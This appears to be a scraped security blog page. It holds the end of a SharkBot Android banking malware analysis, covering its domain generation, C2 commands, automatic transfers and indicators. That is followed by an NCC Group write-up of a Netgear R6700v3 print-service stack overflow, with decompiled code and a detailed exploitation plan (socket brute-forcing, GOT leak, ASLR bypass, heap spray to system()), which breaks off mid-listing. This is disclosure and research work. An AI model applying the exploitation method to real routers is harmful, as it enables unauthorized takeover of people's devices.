The DGA uses the current date and a specific suffix string (‘pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf’) to finally encode that in base64 and get the first 19 characters. Then, it append different TLDs to generate the final candidate domain.

The date elements used are:

  • Week of the year (v1.get(3) in the code)
  • Year (v1.get(1) in the code)

It uses the ‘+’ operator, but since the week of the year and the year are Integers, they are added instead of appended, so for example: for the second week of 2022, the generated string to be base64 encoded is: 2 + 2022 + “pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf” = 2024 + “pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf” = “2024pojBI9LHGFdfgegjjsJ99hvVGHVOjhksdf”.

In previous versions of SharkBot (from November-December of 2021), it only used the current week of the year to generate the domain. Including the year to the generation algorithm seems to be an update for a better support of the new year 2022.

Commands

SharkBot can receive different commands from the C2 server in order to execute different actions in the infected device such as sending text messages, download files, show injections, etc. The list of commands it can receive and execute is as follows:

  • smsSend: used to send a text message to the specified phone number by the TAs
  • updateLib: used to request the malware downloads a new JAR file from the specified URL, which should contain an updated version of the malware
  • updateSQL: used to send the SQL query to be executed in the SQLite database which Sharkbot uses to save the configuration of the malware (injections, etc.)
  • stopAll: used to reset/stop the ATS feature, stopping the in progress automation.
  • updateConfig: used to send an updated config to the malware.
  • uninstallApp: used to uninstall the specified app from the infected device
  • changeSmsAdmin: used to change the SMS manager app
  • getDoze: used to check if the permissions to ignore battery optimization are enabled, and show the Android settings to disable them if they aren’t
  • sendInject: used to show an overlay to steal user’s credentials
  • getNotify: used to show the Notification Listener settings if they are not enabled for the malware. With this permissions enabled, Sharkbot will be able to intercept notifications and send them to the C2
  • APP_STOP_VIEW: used to close the specified app, so every time the user tries to open that app, the Accessibility Service with close it
  • downloadFile: used to download one file from the specified URL
  • updateTimeKnock: used to update the last request timestamp for the bot
  • localATS: used to enable ATS attacks. It includes a JSON array with the different events/actions it should simulate to perform ATS (button clicks, etc.)

Automatic Transfer System

One of the distinctive parts of SharkBot is that it uses a technique known as Automatic Transfer System (ATS). ATS is a relatively new technique used by banking malware for Android.

To summarize ATS can be compared with webinject, only serving a different purpose. Rather then gathering credentials for use/scale it uses the credentials for automatically initiating wire transfers on the endpoint itself (so without needing to log in and bypassing 2FA or other anti-fraud measures). However, it is very individually tailored and request quite some maintenance for each bank, amount, money mules etc. This is probably one of the reasons ATS isn’t that popular amongst (Android) banking malware.

How does it work?

Once a target logs into their banking app the malware would receive an array of events (clicks/touches, button presses, gestures, etc.) to be simulated in an specific order. Those events are used to simulate the interaction of the victim with the banking app to make money transfers, as if the user were doing the money transfer by himself.

This way, the money transfer is made from the device of the victim by simulating different events, which make much more difficult to detect the fraud by fraud detection systems.

IoCs

Sample Hashes:

  • a56dacc093823dc1d266d68ddfba04b2265e613dcc4b69f350873b485b9e1f1c (Google Play SharkBotDropper)
  • 9701bef2231ecd20d52f8fd2defa4374bffc35a721e4be4519bda8f5f353e27a (Dropped SharkBot v1.64.1)
  • 20e8688726e843e9119b33be88ef642cb646f1163dce4109b8b8a2c792b5f9fc (Google play SharkBot dropper)
  • 187b9f5de09d82d2afbad9e139600617685095c26c4304aaf67a440338e0a9b6 (Google play SharkBot dropper)
  • e5b96e80935ca83bbe895f6239eabca1337dc575a066bb6ae2b56faacd29dd (Google play SharkBot dropper)

SharkBotDropper C2:

  • hxxp://statscodicefiscale[.]xyz/stats/

‘Auto/Direct Reply’ URL used to distribute the malware:

  • hxxps://bit[.]ly/34ArUxI

Google Play Store URL:

C2 servers/Domains for SharkBot:

  • n3bvakjjouxir0zkzmd[.]xyz (185.219.221.99)
  • mjayoxbvakjjouxir0z[.]xyz (185.219.221.99)

RSA Public Key used to encrypt RC4 key in SharkBot:

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2R7nRj0JMouviqMisFYt0F2QnScoofoR7svCcjrQcTUe7tKKweDnSetdz1A+PLNtk7wKJk+SE3tcVB7KQS/WrdsEaE9CBVJ5YmDpqGaLK9qZhAprWuKdnFU8jZ8KjNh8fXyt8UlcO9ABgiGbuyuzXgyQVbzFfOfEqccSNlIBY3s+LtKkwb2k5GI938X/4SCX3v0r2CKlVU5ZLYYuOUzDLNl6KSToZIx5VSAB3VYp1xYurRLRPb2ncwmunb9sJUTnlwypmBCKcwTxhsFVAEvpz75opuMgv8ba9Hs0Q21PChxu98jNPsgIwUn3xmsMUl0rNgBC3MaPs8nSgcT4oUXaVwIDAQAB

RSA Public Key used to encrypt RC4 Key in the Google Play SharkBotDropper:

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9qo1QgM8FH7oAkCLkNO5XfQBUdl+pI4u2tvyFiZZ6hMZ07QnlYazgRmWcC5j5H2iV+74gQ9+1cgjnVSszGbIwVJOQAEZGRpSFT7BhAhA4+PTjH6CCkiyZTk7zURvgBCrXz6+B1XH0OcD4YUYs4OGj8Pd2KY6zVocmvcczkwiU1LEDXo3PxPbwOTpgJL+ySWUgnKcZIBffTiKZkry0xR8vD/d7dVHmZnhJS56UNefegm4aokHPmvzD9p9n3ez1ydzfLJARb5vg0gHcFZMjf6MhuAeihFMUfLLtddgo00Zs4wFay2mPYrpn2x2pYineZEzSvLXbnxuUnkFqNmMV4UJwIDAQAB

BrokenPrint: A Netgear stack overflow

28 February 2022 at 12:43

Summary

This blog post describes a stack-based overflow vulnerability found and exploited in September 2021 by Alex Plaskett, Cedric Halbronn and Aaron Adams working at the Exploit Development Group (EDG) of NCC Group. The vulnerability was patched within the firmware update contained within the following Netgear advisory.

The vulnerability is in the KC_PRINT service (/usr/bin/KC_PRINT), running by default on the Netgear R6700v3 router. Although it is a default service, the vulnerability is only reachable if the ReadySHARE feature is turned on, which means a printer is physically connected to the Netgear router through an USB port. No configuration is needed to be made, so the default configuration is exploitable as soon as a printer is connected to the router.

This vulnerability can be exploited on the LAN side of the router and does not need authentication. It allows an attacker to get remote code execution as the admin user (highest privileges) on the router.

Our exploitation method is very similar to what was used in the Tokyo Drift paper i.e. we chose to change the admin password and start utelnetd service, which allowed us to then get a privileged shell on the router.

We have analysed and exploited the vulnerability on the V1.0.4.118_10.0.90 version, which we detail below, but older versions are likely vulnerable too.

Note: The Netgear R6700v3 router is based on the ARM (32-bit) architecture.

We have named our exploit "BrokenPrint". This is because "KC" is pronounced like "cassé" in French which means "broken" in English.

Vulnerability details

Background on ReadySHARE

This video explains well what ReadySHARE is, but it basically allows to access a USB printer through the Netgear router as if the printer were a network printer.

Reaching the vulnerable memcpy()

The KC_PRINT binary does not have symbols but has a lot of logging/error functions which contain some function names. The code shown below is decompiled code from IDA/Hex-Rays as no open source has been found for this binary.

The KC_PRINT binary creates lots of threads to handle different features:

The first thread handler we are interested in is ipp_server() at address 0xA174. We see it listens on port 631, and when it accepts a client connection, it creates a new thread handled by thread_handle_client_connection() at address 0xA4B4 and passes the client socket to this new thread.

void __noreturn ipp_server()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  addr_len = 0x10;
  optval = 1;
  kc_client = 0;
  pthread_attr_init(&attr);
  pthread_attr_setdetachstate(&attr, 1);
  sock = socket(AF_INET, SOCK_STREAM, 0);
  if ( sock < 0 )
  {
    ...
  }
  if ( setsockopt(sock, 1, SO_REUSEADDR, &optval, 4u) < 0 )
  {
    ...
  }
  memset(&sin, 0, sizeof(sin));
  sin.sin_family = 2;
  sin.sin_addr.s_addr = htonl(0);
  sin.sin_port = htons(631u);                   // listens on TCP 631
  if ( bind(sock, (const struct sockaddr *)&sin, 0x10u) < 0 )
  {
    ...
  }

  // accept up to 128 clients simultaneously
  listen(sock, 128);
  while ( g_enabled )
  {
    client_sock = accept(sock, &addr, &addr_len);
    if ( client_sock >= 0 )
    {
      update_count_client_connected(CLIENT_CONNECTED);
      val[0] = 60;
      val[1] = 0;
      if ( setsockopt(client_sock, 1, SO_RCVTIMEO, val, 8u) < 0 )
        perror("ipp_server: setsockopt SO_RCVTIMEO failed");
      kc_client = (kc_client *)malloc(sizeof(kc_client));
      if ( kc_client )
      {
        memset(kc_client, 0, sizeof(kc_client));
        kc_client->client_sock = client_sock;
        pthread_mutex_lock(&g_mutex);
        thread_index = get_available_client_thread_index();
        if ( thread_index < 0 )
        {
          pthread_mutex_unlock(&g_mutex);
          free(kc_client);
          kc_client = 0;
          close(client_sock);
          update_count_client_connected(CLIENT_DISCONNECTED);
        }
        else if ( pthread_create(
                    &g_client_threads[thread_index],
                    &attr,
                    (void *(*)(void *))thread_handle_client_connection,
                    kc_client) )
        {
          ...
        }
        else
        {
          pthread_mutex_unlock(&g_mutex);
        }
      }
      else
      {
        ...
      }
    }
  }
  close(sock);
  pthread_attr_destroy(&attr);
  pthread_exit(0);
}

The client handler calls into do_http at address 0xA530:

void __fastcall __noreturn thread_handle_client_connection(kc_client *kc_client)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  client_sock = kc_client->client_sock;
  while ( g_enabled && !do_http(kc_client) )
    ;
  close(client_sock);
  update_count_client_connected(CLIENT_DISCONNECTED);
  free(kc_client);
  pthread_exit(0);
}

The do_http() function reads a HTTP-like request until it finds the end of the HTTP headers \r\n\r\n into a 1024-byte stack buffer. It then searches for a POST /USB URI and an _LQ string where usblp_index is an integer. It then calls into is_printer_connected() at 0x16150.

The is_printer_connected() won’t be shown for brevity but all it does is open the /proc/printer_status file, tries to read its content and tries to find an USB port by looking for a string like usblp%d. This will only be found if a printer is connected to the Netgear router, meaning it will never continue further if no printer is connected.

unsigned int __fastcall do_http(kc_client *kc_client)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  kc_client_ = kc_client;
  client_sock = kc_client->client_sock;
  content_len = 0xFFFFFFFF;
  strcpy(http_continue, "HTTP/1.1 100 Continue\r\n\r\n");
  pCurrent = 0;
  pUnderscoreLQ_or_CRCL = 0;
  p_client_data = 0;
  kc_job = 0;
  strcpy(aborted_by_system, "aborted-by-system");
  remaining_len = 0;
  kc_chunk = 0;

  // buf_read is on the stack and is 1024 bytes
  memset(buf_read, 0, sizeof(buf_read));

  // Read in 1024 bytes maximum
  count_read = readUntil_0d0a_x2(client_sock, (unsigned __int8 *)buf_read, 0x400);
  if ( (int)count_read <= 0 )
    return 0xFFFFFFFF;

  // if received "100-continue", sends back "HTTP/1.1 100 Continue\r\n\r\n"
  if ( strstr(buf_read, "100-continue") )
  {
    ret_1 = send(client_sock, http_continue, 0x19u, 0);
    if ( ret_1 <= 0 )
    {
      perror("do_http() write 100 Continue xx");
      return 0xFFFFFFFF;
    }
  }

  // If POST /USB is found
  pCurrent = strstr(buf_read, "POST /USB");
  if ( !pCurrent )
    return 0xFFFFFFFF;
  pCurrent += 9;                                // points after "POST /USB"

  // If _LQ is found
  pUnderscoreLQ_or_CRCL = strstr(pCurrent, "_LQ");
  if ( !pUnderscoreLQ_or_CRCL )
    return 0xFFFFFFFF;
  Underscore = *pUnderscoreLQ_or_CRCL;
  *pUnderscoreLQ_or_CRCL = 0;
  usblp_index = atoi(pCurrent);                 
  *pUnderscoreLQ_or_CRCL = Underscore;
  if ( usblp_index > 10 )                    
    return 0xFFFFFFFF;

  // by default, will exit here as no printer connected
  if ( !is_printer_connected(usblp_index) )
    return 0xFFFFFFFF;                          // exit if no printer connected

  kc_client_->usblp_index = usblp_index;

It then parses the HTTP Content-Length header and starts by reading 8 bytes from the HTTP content. Depending on values of these 8 bytes, it calls into do_airippWithContentLength() at 0x128C0 which is the one we are interested in.

  // /!\ does not read from pCurrent
  pCurrent = strstr(buf_read, "Content-Length: ");
  if ( !pCurrent )
  {
    // Handle chunked HTTP encoding
    ...
  }

  // no chunk encoding here, normal http request
  pCurrent += 0x10;
  pUnderscoreLQ_or_CRCL = strstr(pCurrent, "\r\n");
  if ( !pUnderscoreLQ_or_CRCL )
    return 0xFFFFFFFF;
  Underscore = *pUnderscoreLQ_or_CRCL;
  *pUnderscoreLQ_or_CRCL = 0;
  content_len = atoi(pCurrent);
  *pUnderscoreLQ_or_CRCL = Underscore;
  memset(recv_buf, 0, sizeof(recv_buf));
  count_read = recv(client_sock, recv_buf, 8u, 0);// 8 bytes are read only initially
  if ( count_read != 8 )
    return 0xFFFFFFFF;
  if ( (recv_buf[2] || recv_buf[3] != 2) && (recv_buf[2] || recv_buf[3] != 6) )
  {
    ret_1 = do_airippWithContentLength(kc_client_, content_len, recv_buf);
    if ( ret_1 < 0 )
      return 0xFFFFFFFF;
    return 0;
  }
  ...

The do_airippWithContentLength() function allocates a heap buffer to hold the entire HTTP content, copy the previously 8 bytes already read and reads the remaining bytes into that new heap buffer.

Note: there is no limit on the actual HTTP content size as long as malloc() does not fail due to insufficient memory, which will be useful later to spray memory.

Then, still depending on the values of the 8 bytes initially read, it calls into additional functions. We are interested in the Response_Get_Jobs() at 0x102C4 which contains the stack-based overflow we are going to exploit. Note that other Response_XXX() functions contain similar stack overflows but it seems Response_Get_Jobs() was the most straight forward to exploit, so we targeted this function.

unsigned int __fastcall do_airippWithContentLength(kc_client *kc_client, int content_len, char *recv_buf_initial)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  client_sock = kc_client->client_sock;
  recv_buf2 = malloc(content_len);
  if ( !recv_buf2 )
    return 0xFFFFFFFF;
  memcpy(recv_buf2, recv_buf_initial, 8u);
  if ( toRead(client_sock, recv_buf2 + 8, content_len - 8) >= 0 )
  {
    if ( recv_buf2[2] || recv_buf2[3] != 0xB )
    {
      if ( recv_buf2[2] || recv_buf2[3] != 4 )
      {
        if ( recv_buf2[2] || recv_buf2[3] != 8 )
        {
          if ( recv_buf2[2] || recv_buf2[3] != 9 )
          {
            if ( recv_buf2[2] || recv_buf2[3] != 0xA )
            {
              if ( recv_buf2[2] || recv_buf2[3] != 5 )
                Job = Response_Unk_1(kc_client, recv_buf2);
              else
                // recv_buf2[3] == 0x5
                Job = Response_Create_Job(kc_client, recv_buf2, content_len);
            }
            else
            {
              // recv_buf2[3] == 0xA
              Job = Response_Get_Jobs(kc_client, recv_buf2, content_len);
            }
          }
          else
          {
            ...
}

The first part of the vulnerable Response_Get_Jobs() function code is shown below:

// recv_buf was allocated on the heap
unsigned int __fastcall Response_Get_Jobs(kc_client *kc_client, unsigned __int8 *recv_buf, int content_len)
{
  char command[64]; // [sp+24h] [bp-1090h] BYREF
  char suffix_data[2048]; // [sp+64h] [bp-1050h] BYREF
  char job_data[2048]; // [sp+864h] [bp-850h] BYREF
  unsigned int error; // [sp+1064h] [bp-50h]
  size_t copy_len; // [sp+1068h] [bp-4Ch]
  int copy_len_1; // [sp+106Ch] [bp-48h]
  size_t copied_len; // [sp+1070h] [bp-44h]
  size_t prefix_size; // [sp+1074h] [bp-40h]
  int in_offset; // [sp+1078h] [bp-3Ch]
  char *prefix_ptr; // [sp+107Ch] [bp-38h]
  int usblp_index; // [sp+1080h] [bp-34h]
  int client_sock; // [sp+1084h] [bp-30h]
  kc_client *kc_client_1; // [sp+1088h] [bp-2Ch]
  int offset_job; // [sp+108Ch] [bp-28h]
  char bReadAllJobs; // [sp+1093h] [bp-21h]
  char is_job_media_sheets_completed; // [sp+1094h] [bp-20h]
  char is_job_state_reasons; // [sp+1095h] [bp-1Fh]
  char is_job_state; // [sp+1096h] [bp-1Eh]
  char is_job_originating_user_name; // [sp+1097h] [bp-1Dh]
  char is_job_name; // [sp+1098h] [bp-1Ch]
  char is_job_id; // [sp+1099h] [bp-1Bh]
  char suffix_copy1_done; // [sp+109Ah] [bp-1Ah]
  char flag2; // [sp+109Bh] [bp-19h]
  size_t final_size; // [sp+109Ch] [bp-18h]
  int offset; // [sp+10A0h] [bp-14h]
  size_t response_len; // [sp+10A4h] [bp-10h]
  char *final_ptr; // [sp+10A8h] [bp-Ch]
  size_t suffix_offset; // [sp+10ACh] [bp-8h]

  kc_client_1 = kc_client;
  client_sock = kc_client->client_sock;
  usblp_index = kc_client->usblp_index;
  suffix_offset = 0;                            // offset in the suffix_data[] stack buffer
  in_offset = 0;
  final_ptr = 0;
  response_len = 0;
  offset = 0;                                   // offset in the client data "recv_buf" array
  final_size = 0;
  flag2 = 0;
  suffix_copy1_done = 0;
  is_job_id = 0;
  is_job_name = 0;
  is_job_originating_user_name = 0;
  is_job_state = 0;
  is_job_state_reasons = 0;
  is_job_media_sheets_completed = 0;
  bReadAllJobs = 0;

  // prefix_data is a heap allocated buffer to copy some bytes
  // from the client input but is not super useful from an
  // exploitation point of view
  prefix_size = 74;                             // size of prefix_ptr[] heap buffer
  prefix_ptr = (char *)malloc(74u);
  if ( !prefix_ptr )
  {
    perror("Response_Get_Jobs: malloc xx");
    return 0xFFFFFFFF;
  }
  memset(prefix_ptr, 0, prefix_size);

  // copy bytes indexes 0 and 1 from client data
  copied_len = memcpy_at_index(prefix_ptr, in_offset, &recv_buf[offset], 2u);
  in_offset += copied_len;

  // we make sure to avoid this condition to be validated
  // so we keep bReadAllJobs == 0
  if ( *recv_buf == 1 && !recv_buf[1] )
    bReadAllJobs = 1;
  offset += 2;

  // set prefix_data's bytes index 2 and 3 to 0x00
  prefix_ptr[in_offset++] = 0;
  prefix_ptr[in_offset++] = 0;
  offset += 2;

  // copy bytes indexes 4,5,6,7 from client data
  in_offset += memcpy_at_index(prefix_ptr, in_offset, &recv_buf[offset], 4u);
  offset += 4;
  copy_len_1 = 0x42;

  // copy bytes indexes [8,74] from table keywords
  copied_len = memcpy_at_index(prefix_ptr, in_offset, &table_keywords, 0x42u);
  in_offset += copied_len;
  ++offset;                                     // offset = 9 after this

  // job_data[] and suffix_data[] are 2 stack buffers to copy some bytes
  // from the client input but are not super useful from an
  // exploitation point of view
  memset(job_data, 0, sizeof(job_data));
  memset(suffix_data, 0, sizeof(suffix_data));
  suffix_data[suffix_offset++] = 5;

  // we need to enter this to trigger the stack overflow
  if ( !bReadAllJobs )
  {
    // iteration 1: offset == 9
    // NOTE: we make sure to overwrite the "offset" local variable
    // to be content_len+1 when overflowing the stack buffer to exit this loop after the 1st iteration
    while ( recv_buf[offset] != 3 && offset <= content_len )
    {
      // we make sure to enter this as we need flag2 != 0 later
      // to trigger the stack overflow
      if ( recv_buf[offset] == 0x44 && !flag2 )
      {
        flag2 = 1;
        suffix_data[suffix_offset++] = 0x44;

        // we can set a copy_len == 0 to simplify this
        // offset = 9 here
        copy_len = (recv_buf[offset + 1] << 8) + recv_buf[offset + 2];
        copied_len = memcpy_at_index(suffix_data, suffix_offset, &recv_buf[offset + 1], copy_len + 2);
        suffix_offset += copied_len;
      }
      ++offset;                                 // iteration 1: offset = 10 after this


      // this is the same copy_len as above but just used to skip bytes here
      // offset = 10 here
      copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];
      offset += 2 + copy_len;                   // we can set a copy_len == 0 to simplify this
                                                // iteration 1: offset = 12 after this

      // again, copy_len is pulled from client controlled data,
      // this time used in a copy onto a stack buffer
      // copy_len equals maximum: 0xff00 + 0xff
      // and a copy is made into command[] which is a 2048-byte buffer
      copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];
      offset += 2;                              // iteration 1: offset = 14 after this

      // we need flag2 == 1 to enter this
      if ( flag2 )
      {
        // /!\ VULNERABILITY HERE /!\
        memset(command, 0, sizeof(command));
        memcpy(command, &recv_buf[offset], copy_len);// VULN: stack overflow here
        ...

It first starts by allocating a prefix_ptr heap buffer to hold a few bytes from the client data. Depending on client data bytes 0 and 1, it may set bReadAllJobs = 1 which we want to avoid in order to reach the vulnerable memcpy(), so we make sure bReadAllJobs = 0 remains.

Above we see 2 memset() for 2 stack buffers that we named job_data and suffix_data. We then enter the if ( !bReadAllJobs ). We craft client data to we make sure to validate the while ( recv_buf[offset] != 3 && offset <= content_len ) condition to enter the loop.

We also need to set flag2 = 1 so we make sure to validate the conditions on the client data to enter the if ( recv_buf[offset] == 0x44 && !flag2 ) condition.

Later inside the while loop if flag2 is set, then a 16-bit size (maximum is 0xffff = 65535 bytes) is read from the client data in copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];. Then, this size is used as the argument to memcpy when copying into a 64-byte stack buffer in memcpy(command, &recv_buf[offset], copy_len). This is a stack-based overflow vulnerability where we control the overflowing size and content. There is no limitation on the values of the bytes to use for overflowing, which makes it a very nice vulnerability to exploit at first sight.

Since there is no stack cookie, the strategy to exploit this stack overflow is to overwrite the saved return address on the stack and continue execution until the end of the function to get $pc control.

Reaching the end of the function

It is now important to look at the stack layout from the command[] array we are overflowing from. As can be seen below, command[] is the local variable that is furthest away from the return address. This has the advantage of allowing us to control any of the local variable’s values post-overflow. Remember that we are in the while loop at the moment so the initial idea would be to get out of this loop as soon as possible. By overwriting local variables and setting them to appropriate values, this should be easy.

-00001090 command         DCB 64 dup(?)
-00001050 suffix_data     DCB 2048 dup(?)
-00000850 job_data        DCB 2048 dup(?)
-00000050 error           DCD ?
-0000004C copy_len        DCD ?
-00000048 copy_len_1      DCD ?
-00000044 copied_len      DCD ?
-00000040 prefix_size     DCD ?
-0000003C in_offset       DCD ?
-00000038 prefix_ptr      DCD ?                   ; offset
-00000034 usblp_index     DCD ?
-00000030 client_sock     DCD ?
-0000002C kc_client_1     DCD ?
-00000028 offset_job      DCD ?
-00000024                 DCB ? ; undefined
-00000023                 DCB ? ; undefined
-00000022                 DCB ? ; undefined
-00000021 bReadAllJobs    DCB ?
-00000020 is_job_media_sheets_completed DCB ?
-0000001F is_job_state_reasons DCB ?
-0000001E is_job_state    DCB ?
-0000001D is_job_originating_user_name DCB ?
-0000001C is_job_name     DCB ?
-0000001B is_job_id       DCB ?
-0000001A suffix_copy1_done DCB ?
-00000019 flag2           DCB ?
-00000018 final_size      DCD ?
-00000014 offset          DCD ?
-00000010 response_len    DCD ?
-0000000C final_ptr       DCD ?                   ; offset
-00000008 suffix_offset   DCD ?

So after our overflowing memcpy(), we decide to set client data to hold the "job-id" command to simplify code paths being taken. Then we see the offset += copy_len statement. Since we control both copy_len and offset values due to our overflow, we can craft values to make us exit from the loop condition: while ( recv_buf[offset] != 3 && offset <= content_len ) by setting offset = content_len+1 for instance.

Next we are executing the 2nd read_job_value() call due to bReadAllJobs == 0. The read_job_value() is not relevant for us but its purpose is to loop on all the printer’s jobs and save the requested data (in our case it would be the job-id). In our case, we assume there is no printer’s job at the moment so nothing will be read. This means the offset_job being returned is 0.

  // we need to enter this to trigger the stack overflow
  if ( !bReadAllJobs )
  {
    // iteration 1: offset == 9
    // NOTE: we make sure to overwrite the "offset" local variable
    // to be content_len+1 when overflowing the stack buffer to exit this loop after the 1st iteration
    while ( recv_buf[offset] != 3 && offset <= content_len )
    {
      ...
      // we need flag2 == 1 to enter this
      if ( flag2 )
      {
        // /!\ VULNERABILITY HERE /!\
        memset(command, 0, sizeof(command));
        memcpy(command, &recv_buf[offset], copy_len);// VULN: stack overflow here

        // dispatch to right command 
        if ( !strcmp(command, "job-media-sheets-completed") )
        {
          is_job_media_sheets_completed = 1;
        }
        ...
        else if ( !strcmp(command, "job-id") )
        {
          // atm we make sure to send a "job-id\0" command to go here
          is_job_id = 1;
        }
        else
        {
          ...
        }
      }
      offset += copy_len;                       // this is executed before looping
    }
  }                                             // end of while loop

  final_size += prefix_size;
  if ( bReadAllJobs )
    offset_job = read_job_value(usblp_index, 1, 1, 1, 1, 1, 1, job_data);
  else
    offset_job = read_job_value(
                   usblp_index,
                   is_job_id,
                   is_job_name,
                   is_job_originating_user_name,
                   is_job_state,
                   is_job_state_reasons,
                   is_job_media_sheets_completed,
                   job_data);

Now, we continue to look at the vulnerable function code below. Since offset_job = 0, the first if clause is skipped (Note: skipped for now as there is a label that we will jump to later, hence why we kept it in the code below).

Then, a heap buffer to hold a response is allocated and saved in final_ptr. Then, data is copied from the prefix_ptr buffer mentioned at the beginning of the vulnerable function. Finally, it jumps to the b_write_ipp_response2 label where write_ipp_response() at 0x13210 is called. write_ipp_response() won’t be shown for brevity but its purpose is to send an HTTP response to the client socket.

Finally, the 2 heap buffers pointed by prefix_ptr and final_ptr are freed and the function exits.

  // offset_job is an offset inside job_data[] stack buffer
  // atm we assume offset_job == 0 so we skip this condition.
  // Note we assume that due to no printing job currently existing
  // but it would be better to actually make sure all the is_xxx variables == 0 as explained above
  if ( offset_job > 0 )                         // assumed skipped for now
  {
    ...
b_write_ipp_response2:
    final_ptr[response_len++] = 3;
    // the "client_sock" is a local variable that we overwrite
    // when trying to reach the stack address. We need to brute
    // force the socket value in order to effectively send
    // us our leaked data if we really want that data back but
    // otherwise the send() will silently fail
    error = write_ipp_response(client_sock, final_ptr, response_len);

    // From testing, it is safe to use the starting .got address for the prefix_ptr 
    // and free() will ignore that address hehe
    // XXX - not sure why but if I use memset_ptr (offset inside
    //       the .got), it crashes on free() though lol
    if ( prefix_ptr )
    {
      free(prefix_ptr);
      prefix_ptr = 0;
    }

    // Freeing the final_ptr is no problem for us
    if ( final_ptr )
    {
      free(final_ptr);
      final_ptr = 0;
    }

    // this is where we get $pc control
    if ( error )
      return 0xFFFFFFFF;
    else
      return 0;
  }

  // we reach here if no job data
  final_ptr = (char *)malloc(++final_size);
  if ( final_ptr )
  {
    // prefix_ptr is a heap buffer that was allocated at the
    // beginning of this function but pointer is stored in a
    // stack variable. We actually need to corrupt this pointer
    // as part of the stack overflow to reach the return address
    // which means we can leak make it copy any size from any
    // address which results in our leak primitive
    memset(final_ptr, 0, final_size);
    copied_len = memcpy_at_index(final_ptr, response_len, prefix_ptr, prefix_size);
    response_len += copied_len;
    goto b_write_ipp_response2;
  }

  // error below / never reached
  ...
}

Exploitation

Mitigations in place

Our goal is to overwrite the return address to get $pc control but there are a few challenges here. We need to know what static addresses we can use.

Checking the ASLR settings of the kernel:

# cat /proc/sys/kernel/randomize_va_space
1

From here:

  • 0 – Disable ASLR. This setting is applied if the kernel is booted with the norandmaps boot parameter.
  • 1 – Randomize the positions of the stack, virtual dynamic shared object (VDSO) page, and shared memory regions. The base address of the data segment is located immediately after the end of the executable code segment.
  • 2 – Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment. This is the default setting.

Checking the mitigations of the KC_PRINT binary using checksec.py:

[*] '/home/cedric/test/firmware/netgear_r6700/_R6700v3-
V1.0.4.118_10.0.90.zip.extracted/
_R6700v3-V1.0.4.118_10.0.90.chk.extracted/squashfs-root/usr/bin/KC_PRINT'
    Arch:     arm-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8000)

So to summarize:

  • KC_PRINT: not randomized
    • .text: read/execute
    • .data: read/write
  • Libraries: randomized
  • Heap: not randomized
  • Stack: randomized

Building a leak primitive

If we go back to the previous decompiled code we discussed, there are a few things to point out:

final_ptr = (char *)malloc(++final_size);
copied_len = memcpy_at_index(final_ptr, response_len, prefix_ptr, prefix_size);
error = write_ipp_response(client_sock, final_ptr, response_len);

The first one is that in order to overwrite the return address we first need to overwrite prefix_ptr, prefix_size and client_sock.

prefix_ptr needs to be a valid address and this address will be used to copy prefix_size bytes from it into final_ptr. Then that data will be sent back to the client socket assuming client_sock is a valid socket.

This looks like a good leak primitive since we control both prefix_ptr and prefix_size, however we still need to know our previously valid client_sock to get the data back.

However, what if we overwrite the whole stack frame containing all the local variables except we don’t overwrite the saved registers and the return address? Well it will proceed to send us data back and will exit the function as if no overflow happened. This is perfect as it allows us to brute force the client_sock value.

Moreover, by testing multiple times, we noticed that if we are the only client connecting to KC_PRINT the client_sock could be different among KC_PRINT executions. However, once KC_PRINT is started, it will keep allocating the same client_sock for every connection as long as we closed the previous connection.

This is a perfect scenario for us since it means we can initially bruteforce the socket value by overflowing the entire stack frame (except the saved register and return value) until we get an HTTP response, and KC_PRINT will never crashes. Once we know that socket value, we can start leaking data. But where to point prefix_ptr to?

Bypassing ASLR and achieving command execution

Here, there is another challenge to solve. Indeed, at the end of Response_Get_Jobs there is a call to free(prefix_ptr); before we can control $pc. So initially we thought we would need to know a valid heap address that is valid for free().

However after testing in the debugger, we noticed that passing the Global Offset Table (GOT) address to the free() call went through without crashing. We are not sure why as we didn’t investigate for time reasons. However, this opens new opportunities. Indeed, the .got is at a static address due to KC_PRINT being compiled without PIE support. It means we can leak an imported function like memset() which is in libc.so. Then we can deduce the libc.so base address and effectively bypass the ASLR in place for libraries. We can then deduce the system() address.

Our end goal is to call system() on an arbitrary string to execute a shell command. But where to store our data? Initially we thought we could use the data on the stack but the stack is randomized so we can’t hardcode an address in our data. We could use a complicated ROP chain to build the command string to execute, but it seemed over-complicated to do in ARM (32-bit) due to ARM 32-bit alignment of instructions which makes using non-aligned instructions impossible. We also thought about changing the ARM mode to Thumb mode. But is there an even easier method?

What if we could allocate controlled data at a specific address? Then we remembered the excellent blog from Project Zero which mentioned mmap() randomization was broken on 32-bit. And in our case, we know the heap is not randomized, so what about big allocations? It turns out they are randomized but not so well.

Remember we mentioned earlier in this blog post that we can send an HTTP content as big as we want and a heap buffer of that size will be allocated? Now we have a use for it. By sending an HTTP content of e.g. 0x1000000 (16MB), we noticed it gets allocated outside of the [heap] region and above the libraries. More specifically we noticed by testing that an address in the range 0x401xxxxx-0x403xxxxx will always be used.

# cat /proc/317/maps
00008000-00018000 r-xp 00000000 1f:03 1429       /usr/bin/KC_PRINT          // static
00018000-00019000 rw-p 00010000 1f:03 1429       /usr/bin/KC_PRINT          // static
00019000-0001c000 rw-p 00000000 00:00 0          [heap]                     // static
4001e000-40023000 r-xp 00000000 1f:03 376        /lib/ld-uClibc.so.0        // ASLR
4002a000-4002b000 r--p 00004000 1f:03 376        /lib/ld-uClibc.so.0
